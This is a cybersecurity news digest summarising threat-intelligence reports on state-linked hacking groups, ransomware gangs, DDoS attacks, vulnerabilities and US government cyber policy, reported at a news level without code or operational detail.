DDoS attack on Romanian government attributed to Killnet.
Romanian authorities have attributed the distributed denial-of-service attack government websites experienced late last week to Killnet, a threat actor specializing in DDoS attacks conducted in the interest of Russia, the Record reports. The attack affected Romania’s ministry of defense, its border police, the national railway, and the OTP Bank. Killnet claimed that the attacks were a retaliation for Romania’s support of Ukraine in the face of Russia’s invasion.
The Romanian Intelligence Service has reported that the attacks began around 4 am and the sites were down for several hours, and stated, “Following the investigations carried out by the CYBERINT National Center within the Romanian Intelligence Service, it was established that the cyberattackers used network equipment from outside Romania. The attackers took control of the equipment in question by exploiting cybersecurity vulnerabilities [and] the lack of cybersecurity measures and used them as a vector of attack on sites in Romania.” The National Directorate of Cyber Security (DNSC) has reported that it plans on releasing a list of the IP addresses involved in the attack as they work to resolve issues resulting from the attack.
Sabotage incident in France highlights vulnerabilities in infrastructure.
The sabotage incident in which fiber-optic cables in France were cut, severing Internet and telecommunications connections, CyberScoop reports, is seen as exhibiting the vulnerability of infrastructure to physical disruption. The incident remains under investigation. The sabotage is regarded as having been coordinated, but there’s so far been no attribution.
“When you think about the attack and the amount of fiber optic cable that’s out there, it would be hard to protect. This is a target that is not that hard to go after,” said Bob Kolasky, former Director of the Cybersecurity and Infrastructure Security Agency’s National Risk Management Center, where he worked from 2018 until March 2022. He notes that the attack is “more significant than anything we’ve ever seen.” Scholars highlight that it is important to note the conflict in Ukraine and the defeat of far-right nationalist candidate Marine Le Pen, who supported Vladimir Putin for years. Kolasky stated, “Given what’s going on with the larger conflict with Russia, you have to be a little bit paranoid this is a case of Russian aggression. Events like this will get the attention of the White House and the agency and security professionals because we’re just worried about escalation potentially affecting critical infrastructure.”
CyberScoop says that Marek Posard, a military sociologist at the RAND Corporation who researches disinformation, said that his concern is “adversaries might target fringe groups — who are already ginned up following a contentious election in France — with the hopes that some of these fringe groups will launch attacks on their own country.”
Cozy Bear threat actor engaging in cyberespionage targeting diplomats.
Cozy Bear (also called Nobelium or APT29, a threat actor associated with Russia’s SVR foreign intelligence service) has continued to engage in cyberespionage against a wide range of diplomatic targets. The campaigns have achieved initial access through spearphishing, and they’re marked, BleepingComputer reports, by the abuse of “Atlassian Trello, and other legitimate cloud service platforms, for command and control (C2) communication.”
Mandiant reports that beginning in mid-January 2022, a diplomatic entity was the target of the APT29 phishing campaign and that it detected and responded to the attack, and in the process of uncovering the campaign, more diplomatic and government entities were found to be targets. The campaign co-opted legitimate email addresses, and disguised the emails as administrative notices related to various embassies. This attack was found to be similar to prior Nobelium campaigns, which also made diplomats and diplomatic entities targets, used ROOTSAW to deliver payloads, and misused Firebase or Dropbox for C2. Misusing Trello, Firebase, and Dropbox were likely done to make detection of the scam harder, or even to make remediation from the scam harder.
REvil seems to be returning.
There’s more evidence that the REvil ransomware gang is back from what appears to have been a temporary occultation. Its Tor network returned, BleepingComputer says, but researchers were looking for code that could be attributed to the gang. Researchers at Avast found code samples (confirmed by researcher R3MRUM) that seem to connect the new activity to REvil. Rebranding appears to be underway, but the gang seems careless about covering its tracks.
Vulnerability reported affecting DNS implementation of uClibc and uClibc-ng.
Nozomi Networks reports finding a vulnerability (ICS-VU-638779, VU#473698) that affects the Domain Name System implementation of all versions of uClibc and uClibc-ng. This involves a C standard library widely used in IoT products. The vulnerability opens affected devices to DNS poisoning attacks.
uClibc is known to be used by major corporations such as Netgear, Linksys, and formerly Axis. This vulnerability is still unpatched, as the library maintainer could not develop a fix. It was not reported what devices were able to reproduce the vulnerability, as it remains unpatched for the time being. What is known, however, is that there was a wide range of affected IoT devices running the latest version of firmware, with a high chance of deployment through all critical infrastructure.
Moshen Dragon threat actor operating in Central Asia.
Sentinel Labs has been following the activities of “Moshen Dragon,” which they describe as “a Chinese-aligned cyberespionage threat actor operating in Central-Asia.” Moshen Dragon’s approach is interesting, involving “trial-and-error abuse of traditional antivirus products to attempt to sideload malicious DLLs.”
Chinese APT resurfacing.
Another Chinese APT (variously called Lotus Panda, Override Panda, or Naikon) has resurfaced after a period of occultation. Cluster25 has been tracking the APT’s cyberespionage against ASEAN nations.
ASEAN nations are being targeted likely because of associations with the West and more capitalist economic models, making it more likely that the countries could have important and classified foreign affairs or military information, which could likely be acquired and exploited by the Chinese APT in China’s interest. This is especially likely, as the APT group has previously targeted government agencies and military organizations in South Asia, with most government targets focused around foreign affairs and science and technology. The group’s hacking arsenal was observed, and it was found that the group typically engages in long-term espionage and intelligence.
BlackBasta ransomware possibly linked to Conti gang.
SecurityWeek reports that security firms have been seeing evidence suggesting links between the recently observed BlackBasta ransomware operation and the Conti gang. BlackBasta’s high-profile victims have included Deutsche Windtechnik and the American Dental Association. Researchers at Minerva believe each BlackBasta sample is specially created for a specific victim, “as a company id is hardcoded into the ransom note as well as a public key.”
Conti and Hive gang chats leaked.
Cisco Talos researchers have released the results of their study of leaked Conti and Hive ransomware gang chats. Both groups do extensive pre-attack research into prospective victims, and both gangs negotiate their demands (and are quick to lower them, presumably on the proverbial grounds that half a loaf is better than none). Conti is hands down the more professional of the two, with Hive exhibiting a crudely direct approach to extortion as well as slipshod opsec.
Cuckoo Bees attack targets intellectual property.
Cybereason today described “Cuckoo Bees,” which it characterizes as a “massive” Chinese cyberespionage effort directed at stealing US firms’ intellectual property.
It was discovered that the Cuckoo Bees campaign is likely the work of Chinese APT Winnti, who works on behalf of Chinese interests and specializes in cyberespionage and intellectual property theft. The campaign went undetected for years. The campaign targeted technology and manufacturing companies throughout North America, Europe, and Asia, and was discovered in 2021, with its operations taking place since at least 2019. The discovery of Cuckoo Bees revealed a new malware strain used by Winnti called DEPLOYLOG and brought attention to new versions of existing Winnti malware. The threat actor was also shown to abuse a Windows’ Common Log File System (CLFS) by stashing a payload into the CLFS log file, which is rarely seen anywhere.
Four strains of ransomware tied to North Korea’s Lazarus Group.
Trellix researchers reported yesterday that North Korea’s army has made another foray into the ransomware market. Trellix has tied four strains of ransomware, BEAF, PXJ, ZZZZ and CHiCHi, to Pyongyang’s Unit 180, also known as APT38, also known as the Lazarus Group. The New Yorker boggles at the group’s “incredible rise,” but Unit 180 has been making a pest of itself for some time. Trellix speculates that the East Asian target set being prospected in these recent campaigns, and the campaigns’ relatively small and selective scale, suggests that Unit 180 is seeking to determine whether there’s a good chance of profit from a resurgent ransomware effort.
Cyberespionage group targeting corporate email accounts.
Mandiant is tracking a cyberespionage group it follows as UNC3524 that has taken an interest in corporate email accounts associated with companies engaged in large financial transactions, especially those related to mergers and acquisitions. UNC3524 is noteworthy for its ability to achieve undetected persistence in targeted networks, an ability Mandiant attributes to a novel backdoor, “QuietExit,” which has enabled the threat actor to establish itself for as long as eighteen months before being detected. While the researchers find overlaps in technique between UNC3524 and both Cozy Bear (Russia’s SVR) and Fancy Bear (Russia’s GRU), they so far lack sufficient evidence for definitive attribution.
Log4j vulnerability difficult to detect.
Researchers at Cequence warn that the Log4j vulnerability may be more widespread and harder to detect than initially thought. The researchers say they “found unpatched servers within our customers’ digital supply chain that appeared some 15 hours after the initial test results were received.”
It was reported by CISA that the Log4j vulnerability was the most exploited vulnerability by hackers in 2021, and Cequence researchers say that it’s likely that there are more unpatched Log4j instances than are known, and that it seems that initial testing of vulnerabilities may be too focused on the immediate blast radius. It was shown that of the 50 organizations analyzed, 36% were still vulnerable, with universities and financial services at the top of the risk list, and retail and healthcare faring better and rounding off the bottom of the list. Security experts agree that Log4j is a vulnerability that will be risky for the foreseeable future.
US Cyber Command sends team to Lithuania to help with defensive cyber operations.
US Cyber Command’s Cyber National Mission Force (CNMF) recently sent a team to Lithuania to assist in the country’s defensive cyber operations. Cyber Command stated, “At the invitation of the Lithuanian government, U.S. Cyber Command’s Cyber National Mission Force deployed a hunt forward team to conduct defensive cyber operations alongside partner cyber forces, concluding in May. For three months, the U.S. cyber operators hunted for malicious cyber activity on key Lithuanian national defense systems and Ministry of Foreign Affairs’ networks alongside its allies. This was the first shared defensive cyber operation between Lithuanian cyber forces and CNMF in their country.”
Anonymous leaks Nauru Police emails.
Anonymous has non-Russian targets, too. HackRead reports that the loose hacker collective Anonymous has leaked 82 GB worth of emails allegedly belonging to the Nauru Police Force. Anonymous claims the leak is meant to expose alleged abuses committed by the police on the island, which has been used as an immigration detention center by the Australian government.
The alleged abuses Anonymous claims to have occurred are contained in the emails that have been leaked. Anonymous also provides a list of demands, including that there be an end to the policy of mandatory immigration and that immigration detention centers be closed, including the ones on Nauru. They also ask that permanent residence be granted to all asylum seekers and that the abuse allegations in the detention centers be investigated, with lifetime reparations given to victims.
Raspberry Robin worm distributed through USB drives.
Red Canary is following some malicious activity it’s calling Raspberry Robin, which distributes a worm that’s often installed via a USB drive. “This activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names. We also observed Raspberry Robin use TOR exit nodes as additional command and control (C2) infrastructure.” Who the threat actor is and what their objectives are remain obscure.
Evasive phishing campaign targets corporate networks.
Menlo Labs describes a credential phishing campaign that uses malicious html attachments in the course of gaining access to corporate networks. The researchers classify the operation as a Highly Evasive Adaptive Threat (HEAT) able to evade many legacy security tools. The lures used are carefully tailored to the targets.
The campaign uses HTML attachments in emails sent to potential victims. HTML attachments are viewed unlike other attachments in secure email gateways (SEGs), as they are not usually blocked because large financial firms often send legitimate encrypted emails in the form of HTML attachments. The tailored lures for the victims are based on services utilized by their companies in order to make the email and attachments seem more legitimate. The victim is prompted after opening the attachment to log into a service they use using their credentials, and the scammer gets sent the information if it’s correct.
Keeping a keen eye out for Mother’s Day scams.
This Sunday is Mother’s Day in the US and other jurisdictions where the greeting card companies’ writ runs, and Trend Micro offers some timely advice on avoiding being scammed in the course of rendering annual honors to Mater. They flag three scam websites in particular, and point out that they bear the usual marks of fraud: unusual payment methods (like wire transfers), an inappropriate curiosity about personal information, misspellings and non-standard usage, no genuine customer reviews, and the infallible, by this shall ye know the scammer, deal that’s too good to be true. So stay safe online (Mom would want that for you).
The US Cybersecurity and Infrastructure Security Agency (CISA) issued an industrial control system advisory Tuesday for Yokogawa CENTUM and ProSafe-RS. Another industrial control system security advisory affecting Johnson Controls Metasys was released Friday.
The US Cybersecurity and Infrastructure Security Agency (CISA) has added five vulnerabilities to its Known Exploited Vulnerabilities Catalog. Two of the vulnerabilities affect Apple products (CVE-2019-8506 and CVE-2021-1789), one affects Microsoft’s Win32k driver (CVE-2014-4113), one impacts Internet Explorer (CVE-2014-0322), and one affects OpenSSL (CVE-2014-0160). Agencies are required to patch the vulnerabilities by May 25th.
Policies, procurements, and agency equities.
A US National Security Memorandum has been released warning about the risks quantum computing could pose to civilian and military communications and online financial transactions, as the new technology is capable of cracking the public key cryptography currently used on most digital systems. The document outlines a plan for employing multi-agency coordination to migrate vulnerable computer systems to quantum-resistant cryptography. NSA and NIST will develop and publish new quantum-resistant cryptographic standards by 2024.
The Record reports that General Paul Nakasone has been asked to extend his four-year tour at the head of US Cyber Command and NSA for another year.